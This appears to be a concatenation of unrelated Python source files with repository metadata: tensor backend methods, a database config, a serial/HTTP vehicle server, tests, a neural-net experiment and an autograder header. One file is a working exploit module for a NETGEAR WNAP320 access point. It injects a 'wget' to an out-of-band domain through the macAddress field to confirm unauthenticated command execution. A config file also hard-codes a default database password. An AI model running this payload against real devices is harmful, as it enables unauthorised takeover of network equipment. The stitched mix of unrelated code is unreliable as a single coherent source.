non_negative_diagonal: bool = False) -> Tuple[Tensor, Tensor]:
return decompositions.qr(tf, tensor, pivot_axis, non_negative_diagonal)
def rq(self, tensor: Tensor, pivot_axis: int = -1,
non_negative_diagonal: bool = False) -> Tuple[Tensor, Tensor]:
return decompositions.rq(tf, tensor, pivot_axis, non_negative_diagonal)
def shape_concat(self, values: Tensor, axis: int) -> Tensor:
return tf.concat(values, axis)
def shape_tensor(self, tensor: Tensor) -> Tensor:
return tf.shape(tensor)
def shape_tuple(self, tensor: Tensor) -> Tuple[Optional[int], ...]:
return tuple(tensor.shape.as_list())
def sparse_shape(self, tensor: Tensor) -> Tuple[Optional[int], ...]:
return self.shape_tuple(tensor)
def shape_prod(self, values: Tensor) -> Tensor:
return tf.reduce_prod(values)
def sqrt(self, tensor: Tensor) -> Tensor:
return tf.sqrt(tensor)
def convert_to_tensor(self, tensor: Tensor) -> Tensor:
result = tf.convert_to_tensor(tensor)
return result
def outer_product(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensordot2.tensordot(tf, tensor1, tensor2, 0)
#pylint: disable=unused-argument
def einsum(self,
expression: str,
*tensors: Tensor,
optimize: bool = True) -> Tensor:
return tf.einsum(expression, *tensors)
def norm(self, tensor: Tensor) -> Tensor:
return tf.linalg.norm(tensor)
def eye(self,
N: int,
dtype: Optional[Type[np.number]] = None,
M: Optional[int] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.eye(num_rows=N, num_columns=M, dtype=dtype)
def ones(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.ones(shape=shape, dtype=dtype)
def zeros(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None) -> Tensor:
dtype = dtype if dtype is not None else tf.float64
return tf.zeros(shape, dtype=dtype)
def randn(self,
shape: Tuple[int, ...],
dtype: Optional[Type[np.number]] = None,
seed: Optional[int] = None) -> Tensor:
if seed:
tf.random.set_seed(seed)
dtype = dtype if dtype is not None else tf.float64
if (dtype is tf.complex128) or (dtype is tf.complex64):
return tf.complex(
tf.random.normal(shape=shape, dtype=dtype.real_dtype),
tf.random.normal(shape=shape, dtype=dtype.real_dtype))
return tf.random.normal(shape=shape, dtype=dtype)
def random_uniform(self,
shape: Tuple[int, ...],
boundaries: Optional[Tuple[float, float]] = (0.0, 1.0),
dtype: Optional[Type[np.number]] = None,
seed: Optional[int] = None) -> Tensor:
if seed:
tf.random.set_seed(seed)
dtype = dtype if dtype is not None else tf.float64
if (dtype is tf.complex128) or (dtype is tf.complex64):
#pylint: disable=unexpected-keyword-arg
return tf.complex(
tf.random.uniform(
shape=shape,
minval=boundaries[0],
maxval=boundaries[1],
dtype=dtype.real_dtype),
tf.random.uniform(
shape=shape,
minval=boundaries[0],
maxval=boundaries[1],
dtype=dtype.real_dtype))
tf.random.set_seed(10)
#pylint: disable=unexpected-keyword-arg
a = tf.random.uniform(
shape=shape, minval=boundaries[0], maxval=boundaries[1], dtype=dtype)
return a
def conj(self, tensor: Tensor) -> Tensor:
return tf.math.conj(tensor)
def eigh(self, matrix: Tensor) -> Tuple[Tensor, Tensor]:
return tf.linalg.eigh(matrix)
def addition(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 + tensor2
def subtraction(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 - tensor2
def multiply(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 * tensor2
def divide(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
return tensor1 / tensor2
def index_update(self, tensor: Tensor, mask: Tensor,
assignee: Tensor) -> Tensor:
#returns a copy (unfortunately)
return tf.where(mask, assignee, tensor)
def inv(self, matrix: Tensor) -> Tensor:
if len(matrix.shape) > 2:
raise ValueError("input to tensorflow backend method `inv` has shape {}. "
"Only matrices are supported.".format(tf.shape(matrix)))
return tf.linalg.inv(matrix)
def broadcast_right_multiplication(self, tensor1: Tensor,
tensor2: Tensor) -> Tensor:
if len(tensor2.shape) != 1:
raise ValueError("only order-1 tensors are allowed for `tensor2`, "
"found `tensor2.shape = {}`".format(tf.shape(tensor2)))
return tensor1 * tensor2
def broadcast_left_multiplication(self, tensor1: Tensor,
tensor2: Tensor) -> Tensor:
if len(tensor1.shape) != 1:
raise ValueError("only order-1 tensors are allowed for `tensor1`,"
" found `tensor1.shape = {}`".format(tf.shape(tensor1)))
t1_broadcast_shape = self.shape_concat(
[self.shape_tensor(tensor1), [1] * (len(tensor2.shape) - 1)], axis=-1)
return tensor2 * self.reshape(tensor1, t1_broadcast_shape)
def sin(self, tensor: Tensor) -> Tensor:
return tf.math.sin(tensor)
def cos(self, tensor: Tensor) -> Tensor:
return tf.math.cos(tensor)
def exp(self, tensor: Tensor) -> Tensor:
return tf.math.exp(tensor)
def log(self, tensor: Tensor) -> Tensor:
return tf.math.log(tensor)
def expm(self, matrix: Tensor) -> Tensor:
if len(matrix.shape) != 2:
raise ValueError("input to tensorflow backend method `expm` has shape {}."
" Only matrices are supported.".format(matrix.shape))
if matrix.shape[0] != matrix.shape[1]:
raise ValueError("input to tensorflow backend method `expm` only supports"
"N*N matrix, {x}*{y} matrix is given".format(
x=matrix.shape[0], y=matrix.shape[1]))
return tf.linalg.expm(matrix)
def jit(self, fun: Callable, *args: List, **kwargs: dict) -> Callable:
# tf.function is slow and bad.
return fun
def sum(self,
tensor: Tensor,
axis: Optional[Sequence[int]] = None,
keepdims: bool = False) -> Tensor:
return tf.math.reduce_sum(tensor, axis=axis, keepdims=keepdims)
def matmul(self, tensor1: Tensor, tensor2: Tensor) -> Tensor:
if (tensor1.ndim <= 1) or (tensor2.ndim <= 1):
raise ValueError("inputs to `matmul` have to be a tensors of order > 1,")
return tf.matmul(tensor1, tensor2)
def diagonal(self, tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""Return specified diagonals.
If tensor is 2-D, returns the diagonal of tensor with the given offset,
i.e., the collection of elements of the form a[i, i+offset].
If a has more than two dimensions, then the axes specified by
axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is
returned. The shape of the resulting array can be determined by removing
axis1 and axis2 and appending an index to the right equal to the size of the
resulting diagonals.
This function only extracts diagonals. If you
wish to create diagonal matrices from vectors, use diagflat.
Args:
tensor: A tensor.
offset: Offset of the diagonal from the main diagonal.
axis1, axis2: Axis to be used as the first/second axis of the 2D
sub-arrays from which the diagonals should be taken.
Defaults to second-last and last axis (note this
differs from the NumPy defaults).
These arguments are not supported in the TensorFlow
backend and an error will be raised if they are
specified.
Returns:
array_of_diagonals: A dim = min(1, tensor.ndim - 2) tensor storing
the batched diagonals.
"""
if axis1 != -2 or axis2 != -1:
errstr = (f"axis1={axis1}, axis2={axis2} must be -2, -1 (the defaults)"
f"with TensorFlow backend.")
raise NotImplementedError(errstr)
#pylint: disable=unexpected-keyword-arg
return tf.linalg.diag_part(tensor, k=offset)
def diagflat(self, tensor: Tensor, k: int = 0) -> Tensor:
""" Flattens tensor and creates a new matrix of zeros with its elements
on the k'th diagonal.
Args:
tensor: A tensor.
k : The diagonal upon which to place its elements.
Returns:
tensor: A new tensor with all zeros save the specified diagonal.
"""
#pylint: disable=unexpected-keyword-arg
return tf.linalg.diag(tensor, k=k)
def trace(self, tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""Return summed entries along diagonals.
If tensor is 2-D, the sum is over the
diagonal of tensor with the given offset,
i.e., the collection of elements of the form a[i, i+offset].
If a has more than two dimensions, then the axes specified by
axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is
summed.
Args:
tensor: A tensor.
offset: Offset of the diagonal from the main diagonal.
This argument is not supported in the TensorFlow
backend and an error will be raised if they are
specified.
axis1, axis2: Axis to be used as the first/second axis of the 2D
sub-arrays from which the diagonals should be taken.
Defaults to first/second axis.
These arguments are not supported in the TensorFlow
backend and an error will be raised if they are
specified.
Returns:
array_of_diagonals: The batched summed diagonals.
"""
if offset != 0:
errstr = (f"offset = {offset} must be 0 (the default)"
f"with TensorFlow backend.")
raise NotImplementedError(errstr)
if axis1 == axis2:
raise ValueError(f"axis1 = {axis1} cannot equal axis2 = {axis2}")
N = len(tensor.shape)
if N > 25:
raise ValueError(f"Currently only tensors with ndim <= 25 can be traced"
f"in the TensorFlow backend (yours was {N})")
if axis1 < 0:
axis1 = N+axis1
if axis2 < 0:
axis2 = N+axis2
inds = list(map(chr, range(98, 98+N)))
indsout = [i for n, i in enumerate(inds) if n not in (axis1, axis2)]
inds[axis1] = 'a'
inds[axis2] = 'a'
return tf.einsum(''.join(inds) + '->' +''.join(indsout), tensor)
def abs(self, tensor: Tensor) -> Tensor:
"""
Returns the elementwise absolute value of tensor.
Args:
tensor: An input tensor.
Returns:
tensor: Its elementwise absolute value.
"""
return tf.math.abs(tensor)
def sign(self, tensor: Tensor) -> Tensor:
"""
Returns an elementwise tensor with entries
y[i] = 1, 0, -1 where tensor[i] > 0, == 0, and < 0 respectively.
For complex input the behaviour of this function may depend on the backend.
The TensorFlow version returns y[i] = x[i] / abs(x[i]).
Args:
tensor: The input tensor.
"""
return tf.math.sign(tensor)
| 37.27013
| 80
| 0.638233
|
71e8eaf78fc000dd5398fb58b7f810a6bc4b7f76
| 2,033
|
py
|
Python
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 106
|
2022-03-18T06:51:09.000Z
|
2022-03-31T19:11:41.000Z
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
modules/vulnerabilities/other/netgear-wnap320-rce.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 30
|
2022-03-21T01:27:08.000Z
|
2022-03-31T12:28:01.000Z
|
import requests
from plugins.oob import verify_request, gen_oob_domain
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)''',
"description": '''vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.''',
"severity": "critical",
"references": [
"https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["netgear", "rce", "oast", "router"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
oob_domain,flag = gen_oob_domain()
path = """/boardDataWW.php"""
method = "POST"
data = """macAddress=112233445566%3Bwget+http%3A%2F%2F{oob_domain}%23®info=0&writeData=Submit""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| 28.633803
| 226
| 0.587801
|
36373d9c32e9bddccf8bd3513e1a8c409e6932b8
| 989
|
py
|
Python
|
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | 1
|
2019-07-18T09:24:56.000Z
|
2019-07-18T09:24:56.000Z
|
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | null | null | null |
config/env.py
|
WYL-BruceLong/webinfo-crawler
|
5f8a88a1b3f5c6da1c0276a3cac474d460c70b1c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*-: coding: utf-8 -*-
"""
:author: lubosson
:date: 2019-04-11
:desc:
"""
import logging as log
from config.settings import MysqlConfig
ENV = 'development' # 环境变量
class MysqlEnviron:
mapping = {
'development': MysqlConfig.get('development'),
'testing': MysqlConfig.get('testing'),
'production': MysqlConfig.get('production')
}
CONFIG = mapping.get(ENV, 'development')
if not CONFIG:
log.error('no active environment')
exit(0)
@staticmethod
def host():
return MysqlEnviron.CONFIG.get('host', '127.0.0.1')
@staticmethod
def port():
return MysqlEnviron.CONFIG.get('port', 3306)
@staticmethod
def database():
return MysqlEnviron.CONFIG.get('db', 'geek')
@staticmethod
def username():
return MysqlEnviron.CONFIG.get('username', 'geek')
@staticmethod
def password():
return MysqlEnviron.CONFIG.get('password', 'Geek@123...')
| 20.604167
| 65
| 0.618807
|
0f934c649aff8590efa819f86f4fa2eb860d2413
| 6,406
|
py
|
Python
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
touchmii/OpenTCS-4
|
e3973bd72da63011369a1935de7303bf11bc2a1f
|
[
"MIT"
] | 21
|
2021-07-31T09:35:59.000Z
|
2022-03-25T18:23:45.000Z
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
wmhui007/OpenTCS-4
|
768dc0aebf63b5ac79f869dabcb35f9ebfb4deee
|
[
"MIT"
] | 2
|
2021-01-21T12:39:47.000Z
|
2021-07-29T09:56:22.000Z
|
openTCS-CommAdapter-HTTP/src/test/java/httpserver3.py
|
wmhui007/OpenTCS-4
|
768dc0aebf63b5ac79f869dabcb35f9ebfb4deee
|
[
"MIT"
] | 17
|
2020-09-24T00:09:50.000Z
|
2021-07-07T12:20:41.000Z
|
#!/usr/bin/env python3
"""A simple HTTP server with REST and json for python 3.
addrecord takes utf8-encoded URL parameters
getrecord returns utf8-encoded json.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import argparse
import re
import cgi
import json
import threading
import asyncio
import time
from queue import Queue
from urllib import parse
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
import serial
position = [0,0]
class LocalData(object):
records = {}
qu = Queue(100)
class HTTPRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
if re.search('/api/v1/addrecord/*', self.path):
ctype, pdict = cgi.parse_header(
self.headers.get('content-type'))
if ctype == 'application/json':
length = int(self.headers.get('content-length'))
rfile_str = self.rfile.read(length).decode('utf8')
data = parse.parse_qs(rfile_str, keep_blank_values=1)
record_id = self.path.split('/')[-1]
LocalData.records[record_id] = data
print("addrecord %s: %s" % (record_id, data))
# HTTP 200: ok
self.send_response(200)
else:
# HTTP 400: bad request
self.send_response(400, "Bad Request: must give data")
elif re.search('/v1/vehicle/sendpath', self.path):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
if ctype == 'application/json':
length = int(self.headers.get('content-length'))
rfile_str = self.rfile.read(length).decode('utf8')
data = parse.parse_qs(rfile_str, keep_blank_values=1)
record_id = self.path.split('/')[-1]
LocalData.records[record_id] = data
path = json.loads(rfile_str)
# global sim
# sim.add_path(path)
LocalData.qu.put(path)
print("addrecord %s: %s" % (record_id, data))
# HTTP 200: ok
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
data =json.dumps({"status":"ok"})
self.wfile.write(data.encode('utf8'))
else:
# HTTP 403: forbidden
self.send_response(403)
self.end_headers()
def do_GET(self):
if re.search('/api/v1/shutdown', self.path):
# Must shutdown in another thread or we'll hang
def kill_me_please():
self.server.shutdown()
threading.Thread(target=kill_me_please).start()
# Send out a 200 before we go
self.send_response(200)
elif re.search('/api/v1/getrecord/*', self.path):
record_id = self.path.split('/')[-1]
if record_id in LocalData.records:
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
# Return json, even though it came in as POST URL params
data = json.dumps(LocalData.records[record_id])
print("getrecord %s: %s" % (record_id, data))
self.wfile.write(data.encode('utf8'))
else:
self.send_response(404, 'Not Found: record does not exist')
elif re.search('/v1/vehicle/status', self.path):
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
data =json.dumps({"x":position[0],"y":position[1],"status":"idle","battery":50,"fork":"unload"})
self.wfile.write(data.encode('utf8'))
else:
self.send_response(403)
self.end_headers()
current_position = [0,0]
class sim_vehicle:
def __init__(self, sim_time=0.1):
self.sim_time = sim_time
global current_position
self.target_position = [0,0]
self.position_queue = Queue(100)
def set_sim_time(self, new_sim_time):
self.sim_time = new_sim_time
def add_path(self, new_path):
for path_point in new_path:
self.position_queue.put(path_point)
def get_path(self):
# pass
return list(self.position_queue.queue)
async def start_simulate(self):
while True:
await asyncio.sleep(self.sim_time)
# print(",\n")
print(LocalData.qu.qsize())
if self.target_position != current_position:
if self.target_position[0] - current_position[0] > 10:
pass
async def get_pose():
while True:
await asyncio.sleep(0.2)
#获取串口数据代码
def main():
parser = argparse.ArgumentParser(description='HTTP Server')
parser.add_argument('port', type=int, help='Listening port for HTTP Server')
parser.add_argument('ip', help='HTTP Server IP')
args = parser.parse_args()
server = HTTPServer((args.ip, args.port), HTTPRequestHandler)
print('HTTP Server Running...........')
# server.serve_forever()
threading.Thread(target=server.serve_forever).start()
loop = asyncio.get_event_loop()
# sim = sim_vehicle()
loop.run_until_complete(get_pose())
pp = []
for i in range(10):
pp.append([i,i*2])
sim.add_path(pp)
print(sim.get_path())
#28H 测距定位使能:0:不测距 1 单次测量 2 持续测量 3 单 次自动输出 4 持续自动输出
# client = ModbusClient(method='rtu', port='COM1', timeout=1, baudrate=115200)
# client.connect()
# client.write_register(0x28, 2)
serial = serial.Serial("COM3",115200)
serial.open()
serial.write([0x01,0x10,0x00,0x28,0x00,0x01,0x02,0x00,0x02,0x21,0xB9])
n = serial.inWaiting()
time.sleep(0.1)
serial.read(n)
while True:
#0x2C标签X坐标,0x2D Y坐标
# request = client.read_input_registers(0x2C, 2)
# request = client.read_holding_registers(0x2C, 2)
n2 = serial.inWaiting()
serial.write([0x01,0x03,0x00,0x2A,0x00,0x0D,0xA5,0xC7])
time.sleep(0.1)
rec_data = serial.read(n2)
rec_data[7:9]
position[0] = request.registers[0]
position[1] = request.registers[1]
print('positon: x {}, y{}'.format(positon[0], positon[1]))
time.sleep(0.1)
if __name__ == '__main__':
main()
| 35.588889
| 108
| 0.592257
|
10a7892165cc7739c54e6985c3da25891e499a5b
| 1,466
|
py
|
Python
|
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
tests/func/test_utils.py
|
trappitsch/rttools
|
2aa56470020d1932b8abc2e1e84d211bbb2b2b5a
|
[
"MIT"
] | null | null | null |
"""Test for routiens in utils.py."""
import pytest
import numpy as np
import rttools.utils as utils
def test_kron_delta():
"""Ensure that 1 is returned if two indexes are the same, zero otherwise."""
assert utils.kron_delta(1, 1) == 1
assert utils.kron_delta(1, 2) == 0
def test_kron_delta_array():
"""Kronecker delta return for an array of indexes."""
in1 = np.array([1, 2, 3, 4])
in2 = np.array([1, 2, 4, 4])
in2alt = [1, 2, 4, 4] # as list
out_exp = np.array([1, 1, 0, 1])
np.testing.assert_equal(utils.kron_delta(in1, in2), out_exp)
np.testing.assert_equal(utils.kron_delta(in1, in2alt), out_exp)
def test_kron_delta_value_error():
"""Raise ValueError if shapes mismatch."""
arr1 = np.array([1, 2])
arr2 = np.array([1])
num = 3
with pytest.raises(ValueError) as err_info:
utils.kron_delta(num, arr1)
err_msg = err_info.value.args[0]
assert err_msg == "The inputs must have the same shape."
with pytest.raises(ValueError) as err_info:
utils.kron_delta(arr1, arr2)
err_msg = err_info.value.args[0]
assert err_msg == "The inputs must have the same shape."
@pytest.mark.parametrize(
"value", [[(3.0, 2), "3"], [(5.1264, 3), "5.126"], [(3.0102, 3), "3.01"]]
)
def test_reduce_decimal(value):
"""Test reducing numbers with parameterized values."""
num, prec = value[0]
expected = value[1]
assert utils.reduce_decimal(num, prec) == expected
| 29.918367
| 80
| 0.648022
|
185a7177c1c034c4525c9ab0892f2193bae500bf
| 7,051
|
py
|
Python
|
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
neural_net.py
|
crsavage0630/CS-7641-Assignment2
|
cff1d188046c23eb23221db0aa3d3d771d3d6b1c
|
[
"MIT"
] | null | null | null |
import mlrose_hiive as mlrose
import numpy as np
import pandas as pd
from time import clock
import os
import argparse
import data.DataProcessors as dp
import seaborn as sns
import matplotlib.pyplot as plt
os.environ['seed'] = '45604'
randomSeed = 45604
verbose = True
from sklearn.metrics import accuracy_score, log_loss, f1_score, confusion_matrix, make_scorer, precision_score, mean_squared_error, plot_confusion_matrix, roc_auc_score, recall_score
def plot_results(data_dir, param_name, param_display):
directory="./"+data_dir+"/images/"
if not os.path.exists(directory):
os.makedirs(directory)
path1='./'+data_dir
path2= "./"+data_dir+"/images/"
# nn
ga = pd.read_csv(os.path.join(data_dir,'gatrain_performance.csv'))
sa = pd.read_csv(os.path.join(data_dir,'satrain_performance.csv'))
rh = pd.read_csv(os.path.join(data_dir,'rhtrain_performance.csv'))
gd = pd.read_csv(os.path.join(data_dir,'gdtrain_performance.csv'))
plt.close()
plt.figure()
plt.plot( ga['Iterations'], ga[param_name], label='Gen Alg')
plt.plot( sa['Iterations'], sa[param_name], label='Sim Ann')
plt.plot( rh['Iterations'], rh[param_name], label='Random Hill')
plt.plot( gd['Iterations'], gd[param_name], label='Grad Desc')
plt.legend(title="Algorithm", loc="best")
x_title = "Iterations"
y_title = param_display
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.title("Customer Churn ANN Optimized by RO Algorithms (Train Performance)")
plt.savefig(os.path.join(directory,"train_"+param_name+".png"), format='png', dpi=200, bbox_inches = 'tight', pad_inches = 0)
ga = pd.read_csv(os.path.join(data_dir,'gatest_performance.csv'))
sa = pd.read_csv(os.path.join(data_dir,'satest_performance.csv'))
rh = pd.read_csv(os.path.join(data_dir,'rhtest_performance.csv'))
gd = pd.read_csv(os.path.join(data_dir,'gdtest_performance.csv'))
plt.close()
plt.figure()
plt.plot( ga['Iterations'], ga[param_name], label='Gen Alg')
plt.plot( sa['Iterations'], sa[param_name], label='Sim Ann')
plt.plot( rh['Iterations'], rh[param_name], label='Random Hill')
plt.plot( gd['Iterations'], gd[param_name], label='Grad Desc')
plt.legend(title="Algorithm", loc="best")
x_title = "Iterations"
y_title = param_display
plt.xlabel(x_title)
plt.ylabel(y_title)
plt.title("Customer Churn ANN Optimized by RO Algorithms (Test Performance)")
plt.savefig(os.path.join(directory,"test_"+param_name+".png"), format='png', dpi=200, bbox_inches = 'tight', pad_inches = 0)
def get_model(algorithm, max_iters):
activation = "relu"
print(algorithm)
print(max_iters)
if algorithm == "rh":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'random_hill_climb', \
bias = True, is_classifier = True, early_stopping = True, restarts = 5, max_attempts =10,
max_iters = max_iters, clip_max = 10, random_state = randomSeed)
if algorithm == "ga":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'genetic_alg', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, mutation_prob = .10, random_state = randomSeed)
if algorithm == "sa":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'simulated_annealing', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, schedule = mlrose.GeomDecay(), random_state = randomSeed)
if algorithm == "gd":
return mlrose.NeuralNetwork(hidden_nodes = [10], activation = activation, algorithm = 'gradient_descent', \
bias = True, is_classifier = True, early_stopping = True, max_attempts =10,
max_iters = max_iters, clip_max = 10, random_state = randomSeed)
def run_neural_net(algorithm):
fullData = dp.CustomerChurnModel()
fullData.prepare_data_for_training()
dfTrain = pd.DataFrame(columns=["Iterations","Accuracy","Precision","Recall","F1","ROC AUC","SquareError","TrainTime"])
dfTest = pd.DataFrame(columns=["Iterations","Accuracy","Precision","Recall","F1","ROC AUC","SquareError","TrainTime"])
iterations = np.geomspace(10, 5100, num=40, dtype=int)
index = 0
for iteration in iterations:
print(iteration)
nn_model1 = get_model(algorithm, iteration.item())
start = clock()
nn_model1.fit(fullData.trainX, fullData.trainY)
end = clock()
y_train_pred = nn_model1.predict(fullData.trainX)
y_train_accuracy = accuracy_score(fullData.trainY, y_train_pred)
print(y_train_accuracy)
y_test_pred = nn_model1.predict(fullData.testX)
y_test_accuracy = accuracy_score(fullData.testY, y_test_pred)
print(y_test_accuracy)
dfTrain.loc[index] = [iteration, accuracy_score(fullData.trainY, y_train_pred), precision_score(fullData.trainY, y_train_pred), recall_score(fullData.trainY, y_train_pred), f1_score(fullData.trainY, y_train_pred),roc_auc_score(fullData.trainY, y_train_pred),mean_squared_error(fullData.trainY, y_train_pred),end-start]
dfTest.loc[index] = [iteration, accuracy_score(fullData.testY, y_test_pred), precision_score(fullData.testY, y_test_pred), recall_score(fullData.testY, y_test_pred), f1_score(fullData.testY, y_test_pred),roc_auc_score(fullData.testY, y_test_pred),mean_squared_error(fullData.testY, y_test_pred),0]
index = index + 1
dfTrain.to_csv('{}{}'.format(algorithm,'train_performance.csv'))
dfTest.to_csv('{}{}'.format(algorithm,'test_performance.csv'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Adding optional argument
parser.add_argument("-g", "--ga", help = "Run GA", default='y')
parser.add_argument("-s", "--sa", help = "Run SA", default='y')
parser.add_argument("-r", "--rh", help = "Run RH", default='y')
parser.add_argument("-d", "--gd", help = "Run Gradient Descent", default='y')
parser.add_argument("-p", "--plot", help = "Plot", default='y')
# Read arguments from command line
args = parser.parse_args()
print(args)
if (args.ga == 'y'):
run_neural_net("ga")
if (args.sa == 'y'):
run_neural_net("sa")
if (args.rh == 'y'):
run_neural_net("rh")
if (args.gd == 'y'):
run_neural_net("gd")
if (args.plot == 'y'):
plot_results(".","Accuracy","Accuracy")
plot_results(".","SquareError","Square Error")
plot_results(".","TrainTime","Training Time")
| 43.257669
| 326
| 0.649695
|
84041676d8f6716501aee64c8590d14471c44408
| 8,999
|
py
|
Python
|
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | 2
|
2021-09-13T13:50:09.000Z
|
2021-12-14T07:03:07.000Z
|
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | null | null | null |
CS/CSC384/A2/multiagent/submission_autograder.py
|
jerrysun103/uoft
|
6264583d27c7db94596d29c73804e6d9155de191
|
[
"MIT"
] | 2
|
2021-10-02T21:43:37.000Z
|
2022-01-08T17:46:14.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from codecs import open
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
"""
CS 188 Local Submission Autograder
Written by the CS 188 Staff
==============================================================================
_____ _ _
/ ____| | | |
| (___ | |_ ___ _ __ | |
\___ \| __/ _ \| '_ \| |
____) | || (_) | |_) |_|
|_____/ \__\___/| .__/(_)
| |
|_|
Modifying or tampering with this file is a violation of course policy.
If you're having trouble running the autograder, please contact the staff.
==============================================================================
"""
import bz2, base64
